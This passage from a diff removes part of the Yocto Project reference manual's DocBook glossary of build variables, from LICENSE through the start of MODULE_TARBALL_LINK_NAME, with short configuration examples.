-                            <link linkend='var-SPDXLICENSEMAP'><filename>SPDXLICENSEMAP</filename></link>
-                            flag names defined in
-                            <filename>meta/conf/licenses.conf</filename>.
-                            </para></listitem>
-                    </itemizedlist>
-                </para>
-
-                <para>
-                    Here are some examples:
-                    <literallayout class='monospaced'>
-     LICENSE = "LGPLv2.1 | GPLv3"
-     LICENSE = "MPL-1 &amp; LGPLv2.1"
-     LICENSE = "GPLv2+"
-                    </literallayout>
-                    The first example is from the recipes for Qt, which the user
-                    may choose to distribute under either the LGPL version
-                    2.1 or GPL version 3.
-                    The second example is from Cairo where two licenses cover
-                    different parts of the source code.
-                    The final example is from <filename>sysstat</filename>,
-                    which presents a single license.
-                </para>
-
-                <para>
-                    You can also specify licenses on a per-package basis to
-                    handle situations where components of the output have
-                    different licenses.
-                    For example, a piece of software whose code is
-                    licensed under GPLv2 but has accompanying documentation
-                    licensed under the GNU Free Documentation License 1.2 could
-                    be specified as follows:
-                    <literallayout class='monospaced'>
-     LICENSE = "GFDL-1.2 &amp; GPLv2"
-     LICENSE_${PN} = "GPLv2"
-     LICENSE_${PN}-doc = "GFDL-1.2"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-LICENSE_CREATE_PACKAGE'><glossterm>LICENSE_CREATE_PACKAGE</glossterm>
-            <info>
-                LICENSE_CREATE_PACKAGE[doc] = "Creates an extra package (i.e. ${PN}-lic) for each recipe and adds that package to the RRECOMMENDS+${PN}."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                        Setting <filename>LICENSE_CREATE_PACKAGE</filename>
-                        to "1" causes the OpenEmbedded build system to create
-                        an extra package (i.e.
-                        <filename>${</filename><link linkend='var-PN'><filename>PN</filename></link><filename>}-lic</filename>)
-                        for each recipe and to add those packages to the
-                        <link linkend='var-RRECOMMENDS'><filename>RRECOMMENDS</filename></link><filename>_${PN}</filename>.
-                </para>
-
-                <para>
-                    The <filename>${PN}-lic</filename> package installs a
-                    directory in <filename>/usr/share/licenses</filename>
-                    named <filename>${PN}</filename>, which is the recipe's
-                    base name, and installs files in that directory that
-                    contain license and copyright information (i.e. copies of
-                    the appropriate license files from
-                    <filename>meta/common-licenses</filename> that match the
-                    licenses specified in the
-                    <link linkend='var-LICENSE'><filename>LICENSE</filename></link>
-                    variable of the recipe metadata and copies of files marked
-                    in
-                    <link linkend='var-LIC_FILES_CHKSUM'><filename>LIC_FILES_CHKSUM</filename></link>
-                    as containing license text).
-                </para>
-
-                <para>
-                    For related information on providing license text, see the
-                    <link linkend='var-COPY_LIC_DIRS'><filename>COPY_LIC_DIRS</filename></link>
-                    variable, the
-                    <link linkend='var-COPY_LIC_MANIFEST'><filename>COPY_LIC_MANIFEST</filename></link>
-                    variable, and the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#providing-license-text'>Providing License Text</ulink>"
-                    section in the Yocto Project Development Tasks Manual.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-LICENSE_FLAGS'><glossterm>LICENSE_FLAGS</glossterm>
-            <info>
-                LICENSE_FLAGS[doc] = "Specifies additional flags for a recipe you must whitelist through LICENSE_FLAGS_WHITELIST in order to allow the recipe to be built."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies additional flags for a recipe you must
-                    whitelist through
-                    <link linkend='var-LICENSE_FLAGS_WHITELIST'><filename>LICENSE_FLAGS_WHITELIST</filename></link>
-                    in order to allow the recipe to be built.
-                    When providing multiple flags, separate them with
-                    spaces.
-                </para>
-
-                <para>
-                    This value is independent of
-                    <link linkend='var-LICENSE'><filename>LICENSE</filename></link>
-                    and is typically used to mark recipes that might
-                    require additional licenses in order to be used in a
-                    commercial product.
-                    For more information, see the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#enabling-commercially-licensed-recipes'>Enabling Commercially Licensed Recipes</ulink>"
-                    section in the Yocto Project Development Tasks Manual.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-LICENSE_FLAGS_WHITELIST'><glossterm>LICENSE_FLAGS_WHITELIST</glossterm>
-            <info>
-                LICENSE_FLAGS_WHITELIST[doc] = "Lists license flags that when specified in LICENSE_FLAGS within a recipe should not prevent that recipe from being built."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Lists license flags that when specified in
-                    <link linkend='var-LICENSE_FLAGS'><filename>LICENSE_FLAGS</filename></link>
-                    within a recipe should not prevent that recipe from being
-                    built.
-                    This practice is otherwise known as "whitelisting"
-                    license flags.
-                    For more information, see the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#enabling-commercially-licensed-recipes'>Enabling Commercially Licensed Recipes</ulink>"
-                    section in the Yocto Project Development Tasks Manual.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-LICENSE_PATH'><glossterm>LICENSE_PATH</glossterm>
-            <info>
-                LICENSE_PATH[doc] = "Path to additional licenses used during the build."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Path to additional licenses used during the build.
-                    By default, the OpenEmbedded build system uses <filename>COMMON_LICENSE_DIR</filename>
-                    to define the directory that holds common license text used during the build.
-                    The <filename>LICENSE_PATH</filename> variable allows you to extend that
-                    location to other areas that have additional licenses:
-                    <literallayout class='monospaced'>
-     LICENSE_PATH += "<replaceable>path-to-additional-common-licenses</replaceable>"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-LINUX_KERNEL_TYPE'><glossterm>LINUX_KERNEL_TYPE</glossterm>
-            <info>
-                LINUX_KERNEL_TYPE[doc] = "Defines the kernel type to be used in assembling the configuration."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Defines the kernel type to be used in assembling the
-                    configuration.
-                    The linux-yocto recipes define "standard", "tiny", and
-                    "preempt-rt" kernel types.
-                    See the
-                    "<ulink url='&YOCTO_DOCS_KERNEL_DEV_URL;#kernel-types'>Kernel Types</ulink>"
-                    section in the Yocto Project Linux Kernel Development
-                    Manual for more information on kernel types.
-                </para>
-
-                <para>
-                    If you do not specify a
-                    <filename>LINUX_KERNEL_TYPE</filename>, it defaults to
-                    "standard".
-                    Together with
-                    <link linkend='var-KMACHINE'><filename>KMACHINE</filename></link>,
-                    the <filename>LINUX_KERNEL_TYPE</filename> variable
-                    defines the search
-                    arguments used by the kernel tools to find the appropriate
-                    description within the kernel
-                    <link linkend='metadata'>Metadata</link>
-                    with which to build out the sources and configuration.
-                    </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-LINUX_VERSION'><glossterm>LINUX_VERSION</glossterm>
-            <info>
-                LINUX_VERSION[doc] = "The Linux version from kernel.org on which the Linux kernel image being built using the OpenEmbedded build system is based. You define this variable in the kernel recipe."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The Linux version from <filename>kernel.org</filename>
-                    on which the Linux kernel image being built using the
-                    OpenEmbedded build system is based.
-                    You define this variable in the kernel recipe.
-                    For example, the <filename>linux-yocto-3.4.bb</filename>
-                    kernel recipe found in
-                    <filename>meta/recipes-kernel/linux</filename>
-                    defines the variables as follows:
-                    <literallayout class='monospaced'>
-     LINUX_VERSION ?= "3.4.24"
-                    </literallayout>
-                </para>
-
-                <para>
-                    The <filename>LINUX_VERSION</filename> variable is used to
-                    define <link linkend='var-PV'><filename>PV</filename></link>
-                    for the recipe:
-                    <literallayout class='monospaced'>
-     PV = "${LINUX_VERSION}+git${SRCPV}"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-LINUX_VERSION_EXTENSION'><glossterm>LINUX_VERSION_EXTENSION</glossterm>
-            <info>
-                LINUX_VERSION_EXTENSION[doc] = "A string extension compiled into the version string of the Linux kernel built with the OpenEmbedded build system. You define this variable in the kernel recipe."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    A string extension compiled into the version
-                    string of the Linux kernel built with the OpenEmbedded
-                    build system.
-                    You define this variable in the kernel recipe.
-                    For example, the linux-yocto kernel recipes all define
-                    the variable as follows:
-                    <literallayout class='monospaced'>
-     LINUX_VERSION_EXTENSION ?= "-yocto-${<link linkend='var-LINUX_KERNEL_TYPE'>LINUX_KERNEL_TYPE</link>}"
-                    </literallayout>
-                </para>
-
-                <para>
-                    Defining this variable essentially sets the
-                    Linux kernel configuration item
-                    <filename>CONFIG_LOCALVERSION</filename>, which is visible
-                    through the <filename>uname</filename> command.
-                    Here is an example that shows the extension assuming it
-                    was set as previously shown:
-                    <literallayout class='monospaced'>
-     $ uname -r
-     3.7.0-rc8-custom
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-LOG_DIR'><glossterm>LOG_DIR</glossterm>
-            <info>
-                LOG_DIR[doc] = "Specifies the directory to which the OpenEmbedded build system writes overall log files. The default directory is ${TMPDIR}/log"
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the directory to which the OpenEmbedded build
-                    system writes overall log files.
-                    The default directory is <filename>${TMPDIR}/log</filename>.
-                </para>
-
-                <para>
-                    For the directory containing logs specific to each task,
-                    see the <link linkend='var-T'><filename>T</filename></link>
-                    variable.
-                </para>
-            </glossdef>
-        </glossentry>
-
-    </glossdiv>
-
-    <glossdiv id='var-glossary-m'><title>M</title>
-
-         <glossentry id='var-MACHINE'><glossterm>MACHINE</glossterm>
-            <info>
-                MACHINE[doc] = "Specifies the target device for which the image is built. You define MACHINE in the conf/local.conf file in the Build Directory."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the target device for which the image is built.
-                    You define <filename>MACHINE</filename> in the
-                    <filename>local.conf</filename> file found in the
-                    <link linkend='build-directory'>Build Directory</link>.
-                    By default, <filename>MACHINE</filename> is set to
-                    "qemux86", which is an x86-based architecture machine to
-                    be emulated using QEMU:
-                    <literallayout class='monospaced'>
-     MACHINE ?= "qemux86"
-                    </literallayout>
-                </para>
-
-                <para>
-                    The variable corresponds to a machine configuration file of the
-                    same name, through which machine-specific configurations are set.
-                    Thus, when <filename>MACHINE</filename> is set to "qemux86" there
-                    exists the corresponding <filename>qemux86.conf</filename> machine
-                    configuration file, which can be found in the
-                    <link linkend='source-directory'>Source Directory</link>
-                    in <filename>meta/conf/machine</filename>.
-                </para>
-
-                <para>
-                    The list of machines supported by the Yocto Project as
-                    shipped include the following:
-                    <literallayout class='monospaced'>
-     MACHINE ?= "qemuarm"
-     MACHINE ?= "qemuarm64"
-     MACHINE ?= "qemumips"
-     MACHINE ?= "qemumips64"
-     MACHINE ?= "qemuppc"
-     MACHINE ?= "qemux86"
-     MACHINE ?= "qemux86-64"
-     MACHINE ?= "genericx86"
-     MACHINE ?= "genericx86-64"
-     MACHINE ?= "beaglebone"
-     MACHINE ?= "edgerouter"
-                    </literallayout>
-                    The last five are Yocto Project reference hardware boards, which
-                    are provided in the <filename>meta-yocto-bsp</filename> layer.
-                    <note>Adding additional Board Support Package (BSP) layers
-                        to your configuration adds new possible settings for
-                        <filename>MACHINE</filename>.
-                    </note>
-                </para>
-            </glossdef>
-         </glossentry>
-
-         <glossentry id='var-MACHINE_ARCH'><glossterm>MACHINE_ARCH</glossterm>
-            <info>
-                MACHINE_ARCH[doc] = "Specifies the name of the machine-specific architecture. This variable is set automatically from MACHINE or TUNE_PKGARCH."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the name of the machine-specific architecture.
-                    This variable is set automatically from
-                    <link linkend='var-MACHINE'><filename>MACHINE</filename></link>
-                    or
-                    <link linkend='var-TUNE_PKGARCH'><filename>TUNE_PKGARCH</filename></link>.
-                    You should not hand-edit the
-                    <filename>MACHINE_ARCH</filename> variable.
-                </para>
-            </glossdef>
-         </glossentry>
-
-         <glossentry id='var-MACHINE_ESSENTIAL_EXTRA_RDEPENDS'><glossterm>MACHINE_ESSENTIAL_EXTRA_RDEPENDS</glossterm>
-            <info>
-                MACHINE_ESSENTIAL_EXTRA_RDEPENDS[doc] = "A list of required machine-specific packages to install as part of the image being built. Because this is a 'machine-essential' variable, the list of packages are essential for the machine to boot."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    A list of required machine-specific packages to install as part of
-                    the image being built.
-                    The build process depends on these packages being present.
-                    Furthermore, because this is a "machine-essential" variable, the list of
-                    packages are essential for the machine to boot.
-                    The impact of this variable affects images based on
-                    <filename>packagegroup-core-boot</filename>,
-                    including the <filename>core-image-minimal</filename> image.
-                </para>
-
-                <para>
-                    This variable is similar to the
-                    <filename><link linkend='var-MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS'>MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS</link></filename>
-                    variable with the exception that the image being built has a build
-                    dependency on the variable's list of packages.
-                    In other words, the image will not build if a file in this list is not found.
-                </para>
-
-                <para>
-                    As an example, suppose the machine for which you are building requires
-                    <filename>example-init</filename> to be run during boot to initialize the hardware.
-                    In this case, you would use the following in the machine's
-                    <filename>.conf</filename> configuration file:
-                    <literallayout class='monospaced'>
-     MACHINE_ESSENTIAL_EXTRA_RDEPENDS += "example-init"
-                    </literallayout>
-                </para>
-            </glossdef>
-         </glossentry>
-
-         <glossentry id='var-MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS'><glossterm>MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS</glossterm>
-            <info>
-                MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS[doc] = "A list of recommended machine-specific packages to install as part of the image being built. Because this is a 'machine-essential' variable, the list of packages are essential for the machine to boot."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    A list of recommended machine-specific packages to install as part of
-                    the image being built.
-                    The build process does not depend on these packages being present.
-                    However, because this is a "machine-essential" variable, the list of
-                    packages are essential for the machine to boot.
-                    The impact of this variable affects images based on
-                    <filename>packagegroup-core-boot</filename>,
-                    including the <filename>core-image-minimal</filename> image.
-                </para>
-
-                <para>
-                    This variable is similar to the
-                    <filename><link linkend='var-MACHINE_ESSENTIAL_EXTRA_RDEPENDS'>MACHINE_ESSENTIAL_EXTRA_RDEPENDS</link></filename>
-                    variable with the exception that the image being built does not have a build
-                    dependency on the variable's list of packages.
-                    In other words, the image will still build if a package in this list is not found.
-                    Typically, this variable is used to handle essential kernel modules, whose
-                    functionality may be selected to be built into the kernel rather than as a module,
-                    in which case a package will not be produced.
-                </para>
-
-                <para>
-                    Consider an example where you have a custom kernel where a specific touchscreen
-                    driver is required for the machine to be usable.
-                    However, the driver can be built as a module or
-                    into the kernel depending on the kernel configuration.
-                    If the driver is built as a module, you want it to be installed.
-                    But, when the driver is built into the kernel, you still want the
-                    build to succeed.
-                    This variable sets up a "recommends" relationship so that in the latter case,
-                    the build will not fail due to the missing package.
-                    To accomplish this, assuming the package for the module was called
-                    <filename>kernel-module-ab123</filename>, you would use the
-                    following in the machine's <filename>.conf</filename> configuration
-                    file:
-                    <literallayout class='monospaced'>
-     MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS += "kernel-module-ab123"
-                    </literallayout>
-                    <note>
-                        In this example, the
-                        <filename>kernel-module-ab123</filename> recipe
-                        needs to explicitly set its
-                        <link linkend='var-PACKAGES'><filename>PACKAGES</filename></link>
-                        variable to ensure that BitBake does not use the
-                        kernel recipe's
-                        <link linkend='var-PACKAGES_DYNAMIC'><filename>PACKAGES_DYNAMIC</filename></link>
-                        variable to satisfy the dependency.
-                    </note>
-                </para>
-
-                <para>
-                    Some examples of these machine essentials are flash, screen, keyboard, mouse,
-                    or touchscreen drivers (depending on the machine).
-                </para>
-            </glossdef>
-        </glossentry>
-
-         <glossentry id='var-MACHINE_EXTRA_RDEPENDS'><glossterm>MACHINE_EXTRA_RDEPENDS</glossterm>
-            <info>
-                MACHINE_EXTRA_RDEPENDS[doc] = "A list of machine-specific packages to install as part of the image being built that are not essential for the machine to boot. However, the build process for more fully-featured images depends on the packages being present."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    A list of machine-specific packages to install as part of the
-                    image being built that are not essential for the machine to boot.
-                    However, the build process for more fully-featured images
-                    depends on the packages being present.
-                </para>
-
-                <para>
-                    This variable affects all images based on
-                    <filename>packagegroup-base</filename>, which does not include the
-                    <filename>core-image-minimal</filename> or <filename>core-image-full-cmdline</filename>
-                    images.
-                </para>
-
-                <para>
-                    The variable is similar to the
-                    <filename><link linkend='var-MACHINE_EXTRA_RRECOMMENDS'>MACHINE_EXTRA_RRECOMMENDS</link></filename>
-                    variable with the exception that the image being built has a build
-                    dependency on the variable's list of packages.
-                    In other words, the image will not build if a file in this list is not found.
-                </para>
-
-                <para>
-                    An example is a machine that has WiFi capability but is not
-                    essential for the machine to boot the image.
-                    However, if you are building a more fully-featured image, you want to enable
-                    the WiFi.
-                    The package containing the firmware for the WiFi hardware is always
-                    expected to exist, so it is acceptable for the build process to depend upon
-                    finding the package.
-                    In this case, assuming the package for the firmware was called
-                    <filename>wifidriver-firmware</filename>, you would use the following in the
-                    <filename>.conf</filename> file for the machine:
-                    <literallayout class='monospaced'>
-     MACHINE_EXTRA_RDEPENDS += "wifidriver-firmware"
-                    </literallayout>
-                </para>
-            </glossdef>
-         </glossentry>
-
-         <glossentry id='var-MACHINE_EXTRA_RRECOMMENDS'><glossterm>MACHINE_EXTRA_RRECOMMENDS</glossterm>
-            <info>
-                MACHINE_EXTRA_RRECOMMENDS[doc] = "A list of machine-specific packages to install as part of the image being built that are not essential for booting the machine. The image being built has no build dependencies on the packages in this list."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    A list of machine-specific packages to install as part of the
-                    image being built that are not essential for booting the machine.
-                    The image being built has no build dependency on this list of packages.
-                </para>
-
-                <para>
-                    This variable affects only images based on
-                    <filename>packagegroup-base</filename>, which does not include the
-                    <filename>core-image-minimal</filename> or <filename>core-image-full-cmdline</filename>
-                    images.
-                </para>
-
-                <para>
-                    This variable is similar to the
-                    <filename><link linkend='var-MACHINE_EXTRA_RDEPENDS'>MACHINE_EXTRA_RDEPENDS</link></filename>
-                    variable with the exception that the image being built does not have a build
-                    dependency on the variable's list of packages.
-                    In other words, the image will build if a file in this list is not found.
-                </para>
-
-                <para>
-                    An example is a machine that has WiFi capability but is not essential
-                    For the machine to boot the image.
-                    However, if you are building a more fully-featured image, you want to enable
-                    WiFi.
-                    In this case, the package containing the WiFi kernel module will not be produced
-                    if the WiFi driver is built into the kernel, in which case you still want the
-                    build to succeed instead of failing as a result of the package not being found.
-                    To accomplish this, assuming the package for the module was called
-                    <filename>kernel-module-examplewifi</filename>, you would use the
-                    following in the <filename>.conf</filename> file for the machine:
-                    <literallayout class='monospaced'>
-     MACHINE_EXTRA_RRECOMMENDS += "kernel-module-examplewifi"
-                    </literallayout>
-                </para>
-            </glossdef>
-         </glossentry>
-
-         <glossentry id='var-MACHINE_FEATURES'><glossterm>MACHINE_FEATURES</glossterm>
-            <info>
-                MACHINE_FEATURES[doc] = "Specifies the list of hardware features the MACHINE supports."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the list of hardware features the
-                    <link linkend='var-MACHINE'><filename>MACHINE</filename></link> is capable
-                    of supporting.
-                    For related information on enabling features, see the
-                    <link linkend='var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></link>,
-                    <link linkend='var-COMBINED_FEATURES'><filename>COMBINED_FEATURES</filename></link>,
-                    and
-                    <link linkend='var-IMAGE_FEATURES'><filename>IMAGE_FEATURES</filename></link>
-                    variables.
-                </para>
-
-                <para>
-                    For a list of hardware features supported by the Yocto
-                    Project as shipped, see the
-                    "<link linkend='ref-features-machine'>Machine Features</link>"
-                    section.
-                </para>
-            </glossdef>
-         </glossentry>
-
-        <glossentry id='var-MACHINE_FEATURES_BACKFILL'><glossterm>MACHINE_FEATURES_BACKFILL</glossterm>
-            <info>
-                MACHINE_FEATURES_BACKFILL[doc] = "Features to be added to MACHINE_FEATURES if not also present in MACHINE_FEATURES_BACKFILL_CONSIDERED. This variable is set in the meta/conf/bitbake.conf file and is not intended to be user-configurable."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Features to be added to
-                    <filename><link linkend='var-MACHINE_FEATURES'>MACHINE_FEATURES</link></filename>
-                    if not also present in
-                    <filename><link linkend='var-MACHINE_FEATURES_BACKFILL_CONSIDERED'>MACHINE_FEATURES_BACKFILL_CONSIDERED</link></filename>.
-                </para>
-
-                <para>
-                    This variable is set in the <filename>meta/conf/bitbake.conf</filename> file.
-                    It is not intended to be user-configurable.
-                    It is best to just reference the variable to see which machine features are
-                    being backfilled for all machine configurations.
-                    See the "<link linkend='ref-features-backfill'>Feature Backfilling</link>" section for
-                    more information.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-MACHINE_FEATURES_BACKFILL_CONSIDERED'><glossterm>MACHINE_FEATURES_BACKFILL_CONSIDERED</glossterm>
-            <info>
-                MACHINE_FEATURES_BACKFILL_CONSIDERED[doc] = "Features from MACHINE_FEATURES_BACKFILL that should not be backfilled (i.e. added to MACHINE_FEATURES) during the build."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Features from
-                    <filename><link linkend='var-MACHINE_FEATURES_BACKFILL'>MACHINE_FEATURES_BACKFILL</link></filename>
-                    that should not be backfilled (i.e. added to
-                    <filename><link linkend='var-MACHINE_FEATURES'>MACHINE_FEATURES</link></filename>)
-                    during the build.
-                    See the "<link linkend='ref-features-backfill'>Feature Backfilling</link>" section for
-                    more information.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-MACHINEOVERRIDES'><glossterm>MACHINEOVERRIDES</glossterm>
-            <info>
-                MACHINEOVERRIDES[doc] = "A colon-separated list of overrides that apply to the current machine."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    A colon-separated list of overrides that apply to the
-                    current machine.
-                    By default, this list includes the value of
-                    <link linkend='var-MACHINE'><filename>MACHINE</filename></link>.
-                </para>
-
-                <para>
-                    You can extend <filename>MACHINEOVERRIDES</filename>
-                    to add extra overrides that should apply to a machine.
-                    For example, all machines emulated in QEMU (e.g.
-                    <filename>qemuarm</filename>, <filename>qemux86</filename>,
-                    and so forth) include a file named
-                    <filename>meta/conf/machine/include/qemu.inc</filename>
-                    that prepends the following override to
-                    <filename>MACHINEOVERRIDES</filename>:
-                    <literallayout class='monospaced'>
-     MACHINEOVERRIDES =. "qemuall:"
-                    </literallayout>
-                    This override allows variables to be overriden for all
-                    machines emulated in QEMU, like in the following example
-                    from the <filename>connman-conf</filename> recipe:
-                    <literallayout class='monospaced'>
-     SRC_URI_append_qemuall = "file://wired.config \
-                               file://wired-setup \
-                              "
-                    </literallayout>
-                    The underlying mechanism behind
-                    <filename>MACHINEOVERRIDES</filename> is simply that it is
-                    included in the default value of
-                    <link linkend='var-OVERRIDES'><filename>OVERRIDES</filename></link>.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-MAINTAINER'><glossterm>MAINTAINER</glossterm>
-            <info>
-                MAINTAINER[doc] = "The email address of the distribution maintainer."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The email address of the distribution maintainer.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-MIRRORS'><glossterm>MIRRORS</glossterm>
-            <info>
-                MIRRORS[doc] = "Specifies additional paths from which the OpenEmbedded build system gets source code."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies additional paths from which the OpenEmbedded
-                    build system gets source code.
-                    When the build system searches for source code, it first
-                    tries the local download directory.
-                    If that location fails, the build system tries locations
-                    defined by
-                    <link linkend='var-PREMIRRORS'><filename>PREMIRRORS</filename></link>,
-                    the upstream source, and then locations specified by
-                    <filename>MIRRORS</filename> in that order.
-                </para>
-
-                <para>
-                    Assuming your distribution
-                    (<link linkend='var-DISTRO'><filename>DISTRO</filename></link>)
-                    is "poky", the default value for
-                    <filename>MIRRORS</filename> is defined in the
-                    <filename>conf/distro/poky.conf</filename> file in the
-                    <filename>meta-poky</filename> Git repository.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-MLPREFIX'><glossterm>MLPREFIX</glossterm>
-            <info>
-                MLPREFIX[doc] = "Specifies a prefix has been added to PN to create a special version of a recipe or package (i.e. a Multilib version)."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies a prefix has been added to
-                    <link linkend='var-PN'><filename>PN</filename></link> to create a special version
-                    of a recipe or package (i.e. a Multilib version).
-                    The variable is used in places where the prefix needs to be
-                    added to or removed from a the name (e.g. the
-                    <link linkend='var-BPN'><filename>BPN</filename></link> variable).
-                    <filename>MLPREFIX</filename> gets set when a prefix has been
-                    added to <filename>PN</filename>.
-                    <note>
-                        The "ML" in <filename>MLPREFIX</filename> stands for
-                        "MultiLib".
-                        This representation is historical and comes from
-                        a time when <filename>nativesdk</filename> was a suffix
-                        rather than a prefix on the recipe name.
-                        When <filename>nativesdk</filename> was turned into a
-                        prefix, it made sense to set
-                        <filename>MLPREFIX</filename> for it as well.
-                    </note>
-                </para>
-
-                <para>
-                    To help understand when <filename>MLPREFIX</filename>
-                    might be needed, consider when
-                    <link linkend='var-BBCLASSEXTEND'><filename>BBCLASSEXTEND</filename></link>
-                    is used to provide a <filename>nativesdk</filename> version
-                    of a recipe in addition to the target version.
-                    If that recipe declares build-time dependencies on tasks in
-                    other recipes by using
-                    <link linkend='var-DEPENDS'><filename>DEPENDS</filename></link>,
-                    then a dependency on "foo" will automatically get rewritten
-                    to a dependency on "nativesdk-foo".
-                    However, dependencies like the following will not get
-                    rewritten automatically:
-                    <literallayout class='monospaced'>
-     do_foo[depends] += "<replaceable>recipe</replaceable>:do_foo"
-                    </literallayout>
-                    If you want such a dependency to also get transformed,
-                    you can do the following:
-                    <literallayout class='monospaced'>
-     do_foo[depends] += "${MLPREFIX}<replaceable>recipe</replaceable>:do_foo"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-module_autoload'><glossterm>module_autoload</glossterm>
-            <info>
-                module_autoload[doc] = "This variable has been replaced by the KERNEL_MODULE_AUTOLOAD variable. You should replace all occurrences of module_autoload with additions to KERNEL_MODULE_AUTOLOAD."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    This variable has been replaced by the
-                    <filename>KERNEL_MODULE_AUTOLOAD</filename> variable.
-                    You should replace all occurrences of
-                    <filename>module_autoload</filename> with additions to
-                    <filename>KERNEL_MODULE_AUTOLOAD</filename>, for example:
-                    <literallayout class='monospaced'>
-     module_autoload_rfcomm = "rfcomm"
-                    </literallayout>
-                </para>
-
-                <para>
-                    should now be replaced with:
-                    <literallayout class='monospaced'>
-     KERNEL_MODULE_AUTOLOAD += "rfcomm"
-                    </literallayout>
-                    See the
-                    <link linkend='var-KERNEL_MODULE_AUTOLOAD'><filename>KERNEL_MODULE_AUTOLOAD</filename></link>
-                    variable for more information.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-module_conf'><glossterm>module_conf</glossterm>
-            <info>
-                module_conf[doc] = "Specifies modprobe.d syntax lines for inclusion in the /etc/modprobe.d/modname.conf file."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies
-                    <ulink url='http://linux.die.net/man/5/modprobe.d'><filename>modprobe.d</filename></ulink>
-                    syntax lines for inclusion in the
-                    <filename>/etc/modprobe.d/modname.conf</filename> file.
-                </para>
-
-                <para>
-                    You can use this variable anywhere that it can be
-                    recognized by the kernel recipe or out-of-tree kernel
-                    module recipe (e.g. a machine configuration file, a
-                    distribution configuration file, an append file for the
-                    recipe, or the recipe itself).
-                    If you use this variable, you must also be sure to list
-                    the module name in the
-                    <link linkend='var-KERNEL_MODULE_AUTOLOAD'><filename>KERNEL_MODULE_AUTOLOAD</filename></link>
-                    variable.
-                </para>
-
-                <para>
-                    Here is the general syntax:
-                    <literallayout class='monospaced'>
-     module_conf_<replaceable>module_name</replaceable> = "<replaceable>modprobe.d-syntax</replaceable>"
-                    </literallayout>
-                    You must use the kernel module name override.
-                </para>
-
-                <para>
-                    Run <filename>man modprobe.d</filename> in the shell to
-                    find out more information on the exact syntax
-                    you want to provide with <filename>module_conf</filename>.
-                </para>
-
-                <para>
-                    Including <filename>module_conf</filename> causes the
-                    OpenEmbedded build system to populate the
-                    <filename>/etc/modprobe.d/modname.conf</filename>
-                    file with <filename>modprobe.d</filename> syntax lines.
-                    Here is an example that adds the options
-                    <filename>arg1</filename> and <filename>arg2</filename>
-                    to a module named <filename>mymodule</filename>:
-                    <literallayout class='monospaced'>
-     module_conf_mymodule = "options mymodule arg1=val1 arg2=val2"
-                    </literallayout>
-                </para>
-
-                <para>
-                    For information on how to specify kernel modules to
-                    auto-load on boot, see the
-                    <link linkend='var-KERNEL_MODULE_AUTOLOAD'><filename>KERNEL_MODULE_AUTOLOAD</filename></link>
-                    variable.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-MODULE_TARBALL_DEPLOY'><glossterm>MODULE_TARBALL_DEPLOY</glossterm>
-            <info>
-                MODULE_TARBALL_DEPLOY[doc] = "Controls creation of the modules-*.tgz file. Set this variable to "0" to disable creation of this file, which contains all of the kernel modules resulting from a kernel build."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Controls creation of the <filename>modules-*.tgz</filename>
-                    file.
-                    Set this variable to "0" to disable creation of this
-                    file, which contains all of the kernel modules resulting
-                    from a kernel build.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-MODULE_TARBALL_LINK_NAME'><glossterm>MODULE_TARBALL_LINK_NAME</glossterm>
-            <info>
